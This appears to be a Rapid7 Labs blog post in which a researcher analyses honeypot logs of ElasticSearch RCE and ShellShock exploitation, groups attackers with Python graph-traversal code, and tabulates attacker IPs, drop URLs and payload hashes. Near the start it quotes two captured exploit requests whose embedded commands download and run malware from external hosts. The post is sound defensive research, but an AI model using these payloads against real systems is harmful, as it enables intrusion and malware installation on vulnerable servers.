This post is the 12th in the series, "12 Days of HaXmas."

So the Christmas season is here, and between ordering gifts and drinking Glühwein, what better way to spend your time than to sift through some honeypot / firewall / IDS logs and try to make sense of them, right?

At Rapid7 Labs, we're not only scanning the internet, but also looking at who out there is scanning, by making use of honeypot and darknet tools. More precisely, we're running a couple of honeypots spread around the world and collecting raw traffic as PCAP files with something similar to tcpdump (just slightly more clever).

This post is just a quick log of me playing around with some of the honeypot logs. Most of what I'm doing here is happening in one of our backend systems as well, but I figured it might be cool to explain this by doing it manually.

Some background

The honeypot is fairly simple: it waits for incoming connections and then tries to figure out what to do with each one. It might need to treat it as an SSL/TLS connection, or just a plain HTTP request. Depending on the incoming protocol, it will try to answer in a meaningful way. Even with a very basic honeypot that just opens a port and waits for requests, you will quickly find things like this:

GET /_search?source={"query":+{"filtered":+{"query":+{"match_all":+{}}}},+"script_fields":+{"exp":+{"script":+"import+java.util.*;import+java.io.*;String+str+=+\"\";BufferedReader+br+=+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec(\"wget+-O+/tmp/zldyls+http://61.176.223.109:1111/zldyls\").getInputStream()));StringBuilder+sb+=+new+StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},+"size":+1} HTTP/1.1  
Host: redacted:9200  
Connection: keep-alive  
Accept-Encoding: gzip, deflate  
Accept: */*  
User-Agent: python-requests/2.4.1 CPython/2.7.8 Windows/2003Server  

or this:

GET HTTP/1.1 HTTP/1.1  
Accept: */*  
Accept-Language: en-us  
Accept-Encoding: gzip, deflate  
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'  
Host: redacted  
Connection: Close  

What we're looking at are ElasticSearch (slightly modified, as the path was URL-decoded for better readability) and ShellShock exploit attempts. One can quickly see that the technique is fairly straightforward: there's a specific exploit that allows you to run commands. In these cases, the attackers are just running some straightforward shell commands in order to download a file (by any means necessary) and execute it. You can find several writeups about these exploitation attempts and the botnets behind them on the web (e.g. [1], [2], [3]).

Now, because of this common pattern, our honeypot does some basic pattern matching and extracts any URL or command that it finds in the request. If there's a URL (inside a wget/curl/etc. command), it will then try to download that file. We could also do this at a post-processing stage, but by then the URL might not be available any more, as these things tend to disappear or get taken down quickly.
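As a rough illustration of that kind of pattern matching, here is a minimal sketch. The regular expressions and the `extract_urls` helper are assumptions made up for this example; the honeypot's actual matching rules are not shown in this post.

```python
import re

# Assumption: two simple regexes are enough for illustration.
# URLs end at whitespace, quotes, backslashes, ';' or ')'.
URL_RE = re.compile(r"""https?://[^\s"'\\;)]+""")
FETCH_RE = re.compile(r"\b(wget|curl|fetch|lwp-download)\b")

def extract_urls(request_text):
    """Return unique URLs (in order of appearance) if a download command is present."""
    # The ElasticSearch probes encode spaces as '+', so undo that first.
    # (This would mangle URLs that legitimately contain '+'.)
    text = request_text.replace("+", " ")
    if not FETCH_RE.search(text):
        return []
    seen, urls = set(), []
    for url in URL_RE.findall(text):
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls

sample = ('User-Agent: () { :;};/usr/bin/perl -e \'system("cd /tmp; '
          'wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; '
          'lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt*");\'')
print(extract_urls(sample))
```

Each extracted URL would then be handed to a downloader right away, for the reason given above: drop sites tend to vanish quickly.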

Looking at the unique files from roughly the last half year, we can count the following file types (reduced/combined for readability):

    178  ELF 32-bit LSB executable Intel 80386  
     66  a /usr/bin/perl script ASCII text executable  
     33  Bourne-Again shell script ASCII text executable  
     14  POSIX tar archive (GNU)  
     14  ELF 64-bit LSB executable x86-64  
      4  ELF 32-bit LSB executable MIPS  
      2  ELF 32-bit LSB executable ARM  
      1  ELF 32-bit MSB executable PowerPC or cisco 4500  
      1  ELF 32-bit MSB executable MIPS  
      1  OpenSSH DSA public key  

Typically the attacker is uploading a compiled malware binary. In some cases it's a shell script that will in turn download the next stage. And as we can see, there's at least one case of an SSH public key that was uploaded - simple but effective. Also noteworthy is the targeting of quite a few different architectures. These are mostly binaries for embedded routers and, for example, the QNAP devices that are vulnerable to ShellShock.

Getting started on the logs

What kind of logs are we looking at? Mostly, our honeypot emits events like "there was a connection", "I found a URL in a request" and "I downloaded a file from a URL". The first step is to grab a bunch of these events (a few thousand) and apply some geolocation to them (see DAP) (again, modified for better readability):

$ cat logs | dap json + geoip sensor + geoip source + remove some + rename some + json  
{  
  "ref": "conn-d7a38178-0520-49db-a79a-688f5ded5998",  
  "utcts": "2015-12-13T07:36:59.444356Z",  
  "sha1": "3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9",  
  "url": "http://ys-k.ys168.com/2.0/475535157/jRSKjUt4H535F3XKNTV/pycn.zuc",  
  "url.netloc": "ys-k.ys168.com",  
  "source": "117.175.110.177",  
  "source.country_code": "CN",  
  "sensor": "redacted",  
  "sensor.country_code": "JP",  
  "dport": 9200,  
  "http.agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",  
  "http.method": "POST",  
  "vulns": "VULN-ELASTICSEARCH-RCE,CVE-2014-3120,EXEC-SHELLCMD",  
}  
...  

Now we can take these logs and do some correlation, creating one record per "attack". We also add a couple more data sources (ASN lookup, file types for the downloaded files, etc.).

For the sake of this post, let's focus on the attacks that led to downloadable files and that we could categorize as ShellShock / ElasticSearch exploits.
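The correlation and filtering steps could be sketched roughly as follows. This assumes that all events belonging to one connection share the same `ref` value, which is a guess based on the sample record above; the `correlate` and `is_download_attack` helpers and the toy events are hypothetical.

```python
import collections

def correlate(events, key="ref"):
    """Merge all events sharing the same key into one record per attack."""
    attacks = collections.OrderedDict()
    for event in events:
        record = attacks.setdefault(event[key], {})
        for field, value in event.items():
            record.setdefault(field, value)  # first value seen wins
    return list(attacks.values())

def is_download_attack(record):
    """Keep ShellShock / ElasticSearch attacks for which a file was downloaded."""
    vulns = record.get("vulns", "")
    return "sha1" in record and ("SHELLSHOCK" in vulns or "ELASTICSEARCH" in vulns)

# Toy events (made up): connection, extracted URL, completed download.
events = [
    {"ref": "conn-1", "source": "192.0.2.10", "dport": 9200,
     "vulns": "VULN-ELASTICSEARCH-RCE,CVE-2014-3120,EXEC-SHELLCMD"},
    {"ref": "conn-1", "url": "http://drop.example/x", "url.netloc": "drop.example"},
    {"ref": "conn-1", "sha1": "0" * 40},
    {"ref": "conn-2", "source": "198.51.100.5", "dport": 80,
     "vulns": "VULN-SHELLSHOCK,CVE-2014-6271"},
]

attacks = correlate(events)
downloads = [a for a in attacks if is_download_attack(a)]
print(len(attacks), len(downloads))
```

The second toy connection is dropped by the filter because no payload was ever downloaded for it.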

By writing a quick formatting script that does some counting of fields, we get something pretty like this (using Python prettytable) (full version):

+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| key             | count | seen              | sensorcountry | dport      | httpmethod | vulns                       | sha1                                          | url                                                                            |  
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| 221.224.57.66   |   89  | first: 2015-08-05 |  54x US       |  89x 9200  |  89x GET   |  89x VULN-ELASTICSEARCH-RCE |  88x 53c458790384b9c33acafaa0c6ddf9bcbf35997e |  84x http://183.56.173.131:999/xiaojiba                                        |  
| CN              |       | last:  2015-08-08 |  14x JP       |            |            |      CVE-2014-3120          |   1x b6bb2b7cad3790887912b6a8d2203bebedb84427 |   4x http://221.224.57.66:999/xiaojiba                                         |  
| AS 4134         |       |                   |  10x AU       |            |            |      EXEC-SHELLCMD          |                                               |   1x http://221.224.57.66:999/qqqq                                             |  
|                 |       |                   |   5x IE       |            |            |                             |                                               |                                                                                |  
|                 |       |                   |   3x SG       |            |            |                             |                                               |                                                                                |  
|                 |       |                   |   3x BR       |            |            |                             |                                               |                                                                                |  
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| 61.147.103.74   |   87  | first: 2015-05-06 |  55x US       |  87x 9200  |  87x GET   |  87x VULN-ELASTICSEARCH-RCE |  87x f7b229a46b817776d9d2c1052a4ece2cb8970382 |  72x http://61.147.103.74/Aqks                                                 |  
| CN              |       | last:  2015-05-27 |  15x SG       |            |            |      CVE-2014-3120          |                                               |  15x http://61.147.103.74/Aqmds                                                |  
| AS23650         |       |                   |  11x AU       |            |            |      EXEC-SHELLCMD          |                                               |                                                                                |  
|                 |       |                   |   4x JP       |            |            |                             |                                               |                                                                                |  
|                 |       |                   |   2x IE       |            |            |                             |                                               |                                                                                |  
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| 117.175.111.10  |   63  | first: 2015-10-26 |  21x IE       |  63x 9200  |  63x POST  |  63x VULN-ELASTICSEARCH-RCE |  48x 3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9 |  18x http://ys-f.ys168.com/2.0/475535129/gUuMfKl6I345M2KKMN3L/hgfd.pzm         |  
| CN              |       | last:  2015-10-27 |  11x US       |            |            |      CVE-2014-3120          |  15x 139033fef5a1dacbd5764e47f1403ebdf6bd854e |  15x http://ys-m.ys168.com/2.0/475535116/j5I614N5344N6HhSvKVs/pua.kfc          |  
| AS 9808         |       |                   |   9x JP       |            |            |      EXEC-SHELLCMD          |                                               |  15x http://ys-j.ys168.com/2.0/475535140/l5I614M7456NM1hVsIxw/ggg.vip          |  
|                 |       |                   |   8x AU       |            |            |                             |                                               |   9x http://ys-d.ys168.com/2.0/475535151/jRtNjKj7K426K6IH6PLK/wsy.sto          |  
|                 |       |                   |   8x SG       |            |            |                             |                                               |   5x http://183.60.202.97:12100/mmml                                           |  
|                 |       |                   |   6x BR       |            |            |                             |                                               |   1x http://ys-f.ys168.com/2.0/475535137/iTwHtWk4H537H4685MMK/mmml.bbt         |  
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| 189.190.50.56   |   50  | first: 2015-11-05 |  23x US       |  50x 80    |  50x GET   |  50x VULN-SHELLSHOCK        |  37x 21762efb4df7cbb6b2331b34907817499f53be99 |  37x http://189.190.50.56/.b.gif                                               |  
| MX              |       | last:  2015-12-02 |  22x AU       |            |            |      CVE-2014-6271          |   4x 4172d5b70dfe4f5be3aaeb4b2b78fa230a27b97e |   4x http://189.190.50.56/b.gif                                                |  
| AS 8151         |       |                   |   5x BR       |            |            |                             |   4x 3a33f909c486406773b06d8da3b57f530dd80de6 |   4x http://173.220.57.150/scans/ip75.tar                                      |  
|                 |       |                   |               |            |            |                             |   3x ebbe8ebb33e78348a024f8afce04ace6b48cc708 |   3x http://173.220.57.150/scans/dom66.tar                                     |  
|                 |       |                   |               |            |            |                             |   2x 3caf6f7c6f4953b9bbba583dce738481da338ea7 |   2x http://173.220.57.150/scans/php77.tar                                     |  
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
...  

With my test dataset of roughly 2000 "attacks with downloads", this leads to 195 unique sources that make use of several drop URLs and payloads over the course of a couple of months.
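The counting behind such a table can be sketched with `collections.Counter`. This is a minimal sketch and not the actual formatting script: the `summarize` and `format_cell` helpers and the toy records are made up, while the field names follow the sample record shown earlier.

```python
import collections

def summarize(attacks, key="source",
              fields=("sensor.country_code", "dport", "http.method", "sha1", "url")):
    """Count attacks per key and tally the values seen in each field."""
    summary = {}
    for attack in attacks:
        entry = summary.setdefault(
            attack[key],
            {"count": 0, "fields": collections.defaultdict(collections.Counter)})
        entry["count"] += 1
        for field in fields:
            if field in attack:
                entry["fields"][field][attack[field]] += 1
    return summary

def format_cell(counter):
    """Render a Counter in the style of the table cells, e.g. '2x US'."""
    return ", ".join("%dx %s" % (n, v) for v, n in counter.most_common())

# Toy records (made up) using documentation IP ranges.
attacks = [
    {"source": "192.0.2.10", "sensor.country_code": "US", "dport": 9200},
    {"source": "192.0.2.10", "sensor.country_code": "US", "dport": 9200},
    {"source": "192.0.2.10", "sensor.country_code": "JP", "dport": 9200},
    {"source": "198.51.100.5", "sensor.country_code": "AU", "dport": 80},
]

summary = summarize(attacks)
for source, entry in sorted(summary.items(), key=lambda kv: -kv[1]["count"]):
    cells = [format_cell(entry["fields"][f]) for f in ("sensor.country_code", "dport")]
    print(source, entry["count"], " | ".join(cells))
```

Passing a different `key` gives the same kind of summary per group instead of per source IP.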

Basic Threat Intelligence

Beyond simple correlation by source IP, we can now try to organize this data into some groups - basically trying to correlate several attack sources together based on the payloads and drop sites they use. In addition there are also more in-depth methods like analyzing the malware samples and coming up with specific indicators that allow you to group the binaries together even further.

The problem, though, is that doing this grouping manually is painful, as it's not enough to go one level deep. A source that uses a couple of binaries which are also used by another source is the first layer. But then those sources have their own binaries and URLs, and so on and so forth. Basically it comes down to a simple graph traversal. The individual data points, like an attacker IP, a file hash, a drop host IP/name, etc., can be viewed as nodes in a graph that have relationships with each other. All connected subgraphs within this graph make up our "groups" / attacker categories.
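To make the "more than one level deep" point concrete, here is a toy example with made-up records. It uses a disjoint-set (union-find) structure, which is a different technique from the traversal function used later in this post but should produce the same groups; the `find`, `union` and `group_sources` helpers are hypothetical.

```python
def find(parent, node):
    """Return the representative of node's set (with path halving)."""
    parent.setdefault(node, node)
    while parent[node] != node:
        parent[node] = parent[parent[node]]
        node = parent[node]
    return node

def union(parent, a, b):
    """Merge the sets containing a and b."""
    ra, rb = find(parent, a), find(parent, b)
    if ra != rb:
        parent[rb] = ra

def group_sources(records):
    """Group source IPs that are linked through shared payloads or drop hosts."""
    parent = {}
    for r in records:
        payload = ("payload", r["sha1"])
        union(parent, ("source", r["source"]), payload)
        union(parent, payload, ("payloadsrc", r["url.netloc"]))
    groups = {}
    for node in list(parent):
        if node[0] == "source":
            groups.setdefault(find(parent, node), set()).add(node[1])
    return sorted(sorted(g) for g in groups.values())

# Made-up records: .1 and .2 share a payload, .2 and .3 share a drop host.
records = [
    {"source": "192.0.2.1", "sha1": "aaa", "url.netloc": "drop1.example"},
    {"source": "192.0.2.2", "sha1": "aaa", "url.netloc": "drop2.example"},
    {"source": "192.0.2.3", "sha1": "bbb", "url.netloc": "drop2.example"},
    {"source": "198.51.100.7", "sha1": "ccc", "url.netloc": "drop3.example"},
]
print(group_sources(records))
# → [['192.0.2.1', '192.0.2.2', '192.0.2.3'], ['198.51.100.7']]
```

Note that 192.0.2.1 and 192.0.2.3 share neither a payload nor a drop host directly; they end up in the same group only through 192.0.2.2.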

If you create a graph for our honeypot data set, it looks like this:

[Figure: graph of the honeypot data set]

So to categorize our incidents into attacker groups, we build up these subgraphs by writing a graph traversal function. We correlate attackers based on binaries used, hosts used for downloading payloads, and hosts contacted by the malware samples themselves (sadly I didn't get to do this for all of them).

  import collections
  import json

  # DATA: the list of correlated attack records (one dict per attack) from above.
  # GRAPH maps each node, a (type, value) tuple, to the set of its neighbours.
  GRAPH = collections.defaultdict(set)

  def add_edge(fr, to):
      # undirected
      GRAPH[fr].add(to)
      GRAPH[to].add(fr)

  def graph_traversal(src):
      # breadth-first search, yielding every newly discovered (parent, child) edge
      visited = set([src])
      queue = collections.deque([src])
      while queue:
          parent = queue.popleft()
          for child in GRAPH[parent]:
              if child not in visited:
                  yield parent, child
                  visited.add(child)
                  queue.append(child)

  # build the graph: source <-> payload hash <-> drop host (and contacted hosts)
  for e in DATA:
      src = ("source", e["source"])
      payload = ("payload", e["sha1"])
      payloadsrc = ("payloadsrc", e["url.netloc"])

      add_edge(src, payload)
      add_edge(payload, payloadsrc)

      for i in e.get("mal.tcplist", []):
          add_edge(payload, ("c2", i))

  n = 1
  seen = set()

  # every source not yet assigned to a group starts a new traversal
  for src in set(e["source"] for e in DATA):
      if src in seen:
          continue

      members = set()
      indicators = set()

      for (ta, va), (tb, vb) in graph_traversal(("source", src)):
          if ta == "source": members.add(va)
          else: indicators.add((ta, va))
          if tb == "source": members.add(vb)
          else: indicators.add((tb, vb))

      print(json.dumps(dict(members=list(members), indicators=list(indicators), group=n)))
      n += 1
      seen |= members

This leads to 81 groups, as shown by the next table (full version):

+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| key | count | seen              | source               | sourcecountry | srcasn        | sensorcountry | dport      | httpmethod | vulns                       | sha1                                          | url                                                                            |  
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
|   3 |  224  | first: 2015-04-09 | 144x 115.29.174.5    | 210x CN       | 144x AS37963  |  84x US       | 224x 9200  | 158x POST  | 224x VULN-ELASTICSEARCH-RCE | 143x 4db1c73a4a33696da9208cc220f8262fb90767af |  65x http://23.234.25.203:15826/udpg                                           |  
|     |       | last:  2015-12-13 |  31x 222.186.21.201  |  14x KR       |  66x AS23650  |  44x IE       |            |  66x GET   |      CVE-2014-3120          |  81x 2b1f756d1f5b1723df6872d5727bf55f94c7aba9 |  53x http://23.234.25.203:15826/dos                                            |  
|     |       |                   |  14x 14.45.176.29    |               |  14x AS 4766  |  26x JP       |            |            |      EXEC-SHELLCMD          |                                               |  28x http://23.234.25.203:15826/udp                                            |  
|     |       |                   |  14x 61.160.247.231  |               |               |  26x SG       |            |            |                             |                                               |  16x http://23.234.25.203:15826/ud                                             |  
|     |       |                   |   8x 222.186.21.195  |               |               |  23x AU       |            |            |                             |                                               |  13x http://47.88.21.44:15826/udp                                              |  
|     |       |                   |   7x 222.186.21.166  |               |               |  21x BR       |            |            |                             |                                               |   7x http://23.234.25.203:15826/xxoo                                           |  
|     |       |                   |   5x 61.160.223.35   |               |               |               |            |            |                             |                                               |   7x http://61.160.223.35:15826/udp                                            |  
|     |       |                   |   1x 222.186.34.70   |               |               |               |            |            |                             |                                               |   7x http://23.234.25.203:15826/L88                                            |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   6x http://23.234.25.203:15826/xf23                                           |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   5x http://43.230.147.30:2017/udp                                             |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   4x http://61.160.247.231:15826/udp                                           |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   4x http://23.234.25.203:15826/udp110                                         |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.50.47:15826/udpg                                           |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.21.201:15826/udp                                           |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.34.70:2018/udp                                             |  
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
|  12 |   23  | first: 2015-11-17 |   9x 206.217.134.130 |  19x US       |   9x AS36352  |  18x US       |  15x 80    |  15x GET   |  15x VULN-SHELLSHOCK        |   8x 81b65f4165a6b0689c3e7212ccf938dc55aae1bf |   8x http://192.240.106.106/lga                                                |  
|     |       | last:  2015-12-13 |   4x 198.245.72.234  |   2x TR       |   4x AS55286  |   3x AU       |   8x 9200  |   8x POST  |      CVE-2014-6271          |   8x c30026c548cd45be89c4fb01aa6df6fd733de964 |   2x http://69.30.200.250/ide.docx                                             |  
|     |       |                   |   4x 69.12.70.34     |   1x CA       |   4x AS 8100  |   1x JP       |            |            |   8x VULN-ELASTICSEARCH-RCE |   5x fe01a972a63f754fed0322698e16b2edc933f422 |   2x http://188.138.41.134/dd.exe                                              |  
|     |       |                   |   2x 91.191.170.111  |   1x DE       |   2x AS43391  |   1x BR       |            |            |      CVE-2014-3120          |   2x 05f32da77a9c70f429c35828d73d68696ca844f2 |   2x http://37.59.8.213/pacs                                                   |  
|     |       |                   |   1x 142.54.187.42   |               |   1x AS30083  |               |            |            |      EXEC-SHELLCMD          |                                               |   2x http://69.30.200.250/jof                                                  |  
|     |       |                   |   1x 209.126.110.239 |               |   1x AS32613  |               |            |            |                             |                                               |   1x http://69.58.3.226/api                                                    |  
|     |       |                   |   1x 174.142.46.120  |               |   1x AS24940  |               |            |            |                             |                                               |   1x http://192.240.106.106/dax.exe                                            |  
|     |       |                   |   1x 136.243.110.172 |               |   1x AS33387  |               |            |            |                             |                                               |   1x http://174.142.46.120/lma1                                                |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://69.12.70.34/api                                                    |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://188.138.41.134/lma1                                                |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://192.240.106.106/pisd                                               |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://69.30.200.250/jla.cp                                               |  
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
|  13 |   42  | first: 2015-04-23 |  22x 104.192.0.18    |  22x US       |  22x AS27176  |  14x US       |  21x 10000 |  42x GET   |  42x VULN-QNAP-SHELLSHOCK   |  12x 37c5ca684c2f7c9f5a9afd939bc2845c98ef5853 |  20x http://104.192.0.18/apache                                                |  
|     |       | last:  2015-04-27 |  20x 37.220.36.77    |  20x NL       |  20x AS58073  |  10x IE       |  18x 7778  |            |                             |  12x 3e4e34a51b157e5365caa904cbddc619146ae65c |  12x http://104.192.0.18/syn                                                   |  
|     |       |                   |                      |               |               |   8x SG       |   3x 8080  |            |                             |   7x 9d3442cfecf6e850a2d89d2817121e46f796a1b1 |   7x http://104.192.0.18/apache2                                               |  
|     |       |                   |                      |               |               |   7x BR       |            |            |                             |   7x 9851bcec479204f47a3642177c75a16b58d44c20 |   3x http://104.192.0.18/jawk                                                  |  
|     |       |                   |                      |               |               |   3x AU       |            |            |                             |   3x 1a412791a58dca7fc87284e208365d36d19fd864 |                                                                                |  
|     |       |                   |                      |               |               |               |            |            |                             |   1x d538717c89943f42716c139426c031a21b83c236 |                                                                                |  

What else?

As mentioned before, this can be done in much more detail by analyzing the samples further and extracting better/more indicators than the contacted C2 hosts. Also, there is probably more data around the hosts / domains used for the drop sites (payload URLs) that could potentially be used to correlate different sets. If we take some of the hosts/IPs from above and use them to query Project Sonar, we get DNS records, open ports and certificate information:

address 104.152.190.2 had port 80/tcp open  
address 61.147.107.91 was seen in DNS A record for 58559.url.dnspud.com  
address 222.186.21.115 was seen in DNS A record for cc365cc-com-2015-7.com  
saw cert 93e5ad9fdf4c9a432a2ebbb6b0e5e0a055051007 on endpoint 216.99.150.113:465  
address 89.238.81.138 was seen in DNS A record for www.investorfinder.de  
address 97.74.204.6 was seen in DNS A record for teafortwohearts.com  
address 115.238.246.180 had port 80/tcp open  
address 66.240.252.49 had port 993/tcp open  
address 208.76.228.65 was seen in DNS A record for peoplesblueprint.ca  
address 222.141.64.65 had DNS PTR record hn.kd.ny.adsl  
address 180.97.215.7 was seen in DNS A record for jilijia.net  
address 203.171.230.109 was seen in DNS A record for cxyt.org  
elbinvestment.com had a DNS a record with value 89.31.143.1  
address 222.186.30.21 was seen in DNS A record for www.lerhe.com  
saw cert 25907d81d624fd05686111ae73372068488fcc6a on endpoint 178.162.207.107:993  
ys-f.ys168.com had a DNS A record pointing to IP 61.147.125.116  
address 180.97.215.7 had port 995/tcp open  
address 213.155.180.226 had port 465/tcp open  
address 113.10.149.45 was seen in DNS A record for school88le.com  
...  

Following this data, or adding it to the graph, can yield some interesting results. It is also of lower "quality", though: most of the infrastructure used by the attackers probably consists of compromised systems that have lots of other uses, so there's a lot of noise around the attacker's activity.
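If you do want to add this data to the graph, the text lines above first have to be turned into node pairs. The following is a minimal sketch that only understands three of the line formats shown; the `sonar_edges` helper and the node type names ("host", "dns", "cert") are assumptions for illustration.

```python
import re

# (regex, type of first captured value, type of second captured value)
PATTERNS = [
    (re.compile(r"^address (\S+) was seen in DNS A record for (\S+)$"), "host", "dns"),
    (re.compile(r"^address (\S+) had DNS PTR record (\S+)$"), "host", "dns"),
    (re.compile(r"^saw cert ([0-9a-f]{40}) on endpoint ([\d.]+):\d+$"), "cert", "host"),
]

def sonar_edges(lines):
    """Turn recognized lines into ((type, value), (type, value)) pairs."""
    edges = []
    for line in lines:
        line = line.strip()
        for regex, left, right in PATTERNS:
            match = regex.match(line)
            if match:
                edges.append(((left, match.group(1)), (right, match.group(2))))
                break
    return edges

lines = [
    "address 104.152.190.2 had port 80/tcp open",
    "address 222.186.21.115 was seen in DNS A record for cc365cc-com-2015-7.com",
    "saw cert 93e5ad9fdf4c9a432a2ebbb6b0e5e0a055051007 on endpoint 216.99.150.113:465",
    "address 222.141.64.65 had DNS PTR record hn.kd.ny.adsl",
]
for edge in sonar_edges(lines):
    print(edge)
```

Open ports are deliberately ignored here: a node such as "port 80 is open" would connect nearly every host and amplify exactly the noise described above.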

Summing up

Looking through these datasets can be fun but also a bit tricky at times. Command-line kungfu and some scripting can help you pivot around the dataset if you don't want to put in the effort of using a database and something like SQL queries. Incident data and threat intelligence indicators quite often match the graph data model well, and thus we can use simple graph traversal functions or even a real graph database to analyze our data.

In order to analyze most of the samples, I implemented Linux support in Cuckoo Sandbox. It is available in the current development branch - follow us closely for the release of the next version!

Another noteworthy point is that honeypots can still yield some fun (not so much interesting) data nowadays. With internet scanning becoming more popular and easier to do, a few low-skill shotgun-type attackers are joining the game and trying to get quick wins with mass exploitation runs.

Rapid7 Labs is always interested in similar stories if you are willing to share them. Let us know what you think in the comments!

Also feel free to tweet me personally @repmovsb.

Happy HaXmas!

-Mark

References:

[1] CARISIRT: Defaulting on Passwords (Part 1): r0_bot | CARI.net Blog

[2] Malware Must Die!: MMD-0030-2015 - New ELF malware on Shellshock: the ChinaZ

[3] Malware Must Die!: MMD-0032-2015 - The ELF ChinaZ "reloaded"